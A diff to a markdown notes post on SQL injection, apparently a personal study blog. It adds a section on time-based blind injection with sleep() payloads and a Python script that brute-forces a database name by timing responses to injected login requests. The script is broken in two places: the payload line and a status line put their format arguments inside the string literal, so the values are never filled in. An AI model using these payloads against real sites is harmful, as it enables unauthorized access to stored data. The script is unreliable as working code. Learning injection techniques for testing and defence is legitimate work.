--- a/_posts/notes/databases/2021-12-12-sqli.md
+++ b/_posts/notes/databases/2021-12-12-sqli.md
@@ -75,3 +75,61 @@ If we can not pass a string like **"database-name"** we can encode it:
 > echo "database-name" | xxd -ps
 {% endhighlight %}
 ##### (We may remove the **0a**, and add a **0x** at the beggining.)
+
+# [](#header-4)Time Based (Blind)
+We can make sleep the sql function in order to guess if the page is not displaying anything.
+
+For example:
+{% highlight plain %}
+... 'admin' and sleep(5) --If the user is correct it will wait 5 sec 
+... AND if(substr(database(),1,1)='c', sleep(5),1); --
+{% endhighlight %}
+
+We can make a Python Script:
+{% highlight plain %}
+#!/usr/bin/python3
+
+import requests, time, sys, signal
+from pwn import *
+
+url = '[your-url]'
+s = '0123456789abcdefghijklmnopqrstuvwxyz'
+result = ''
+
+def def_handler(sig, frame):
+	log.failure("Saliendo")
+	sys.exit(1)
+
+signal.signal(signal.SIGINT, def_handler)
+
+
+def check(payload):
+	data_post = {
+		'username' : '%s' % payload,
+		'password' : 'test'
+	}
+
+	time_start = time.time()
+	content = requests.post(url, data=data_post)
+	time_end = time.time()
+
+	if (time_end - time_start > 5):
+		return 1
+
+p1 = log.progress('Database')
+p2 = log.progress('Payload')
+
+for i in range(0,10):
+	for c in s:
+		payload = "' OR if(substr(database(),%d,1)='%c', sleep(5),1); -- - % (i, c)"
+		p2.status("%s" % payload)
+		
+		if check(payload):
+			result += c
+			p1.status("%s % result")
+			break
+
+log.info("Database: %s" % result)
+{% endhighlight %}
+
+We can change **database()** from the others functions in the **Error Based** to guess another values (tables, columns,...).
